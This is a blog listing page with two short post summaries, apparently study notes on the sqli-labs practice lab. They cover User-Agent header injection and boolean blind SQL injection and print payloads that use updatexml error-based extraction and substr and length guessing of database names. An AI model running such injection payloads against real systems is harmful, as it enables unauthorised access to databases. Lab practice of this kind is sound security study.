摘要:
less-18 user-agent注入 ' and updatexml(1,concat('~',(select database()),'~'),1),1,1,) -- lq less-19 'or updatexml(1,concat(0x7e,(database())),1) and '1' 阅读全文
posted @ 2022-06-08 18:54
fairytables
阅读(124)
评论(0)
推荐(0)
摘要:
less-15 布尔盲注 ' or (length(database())=8)-- lq 判断数据库长度 'or (substr(database(),1,1)='s' -- lq) 猜库名 'or (substr(select table_name from information_schema 阅读全文
posted @ 2022-06-08 13:22
fairytables
阅读(131)
评论(0)
推荐(0)
浙公网安备 33010602011771号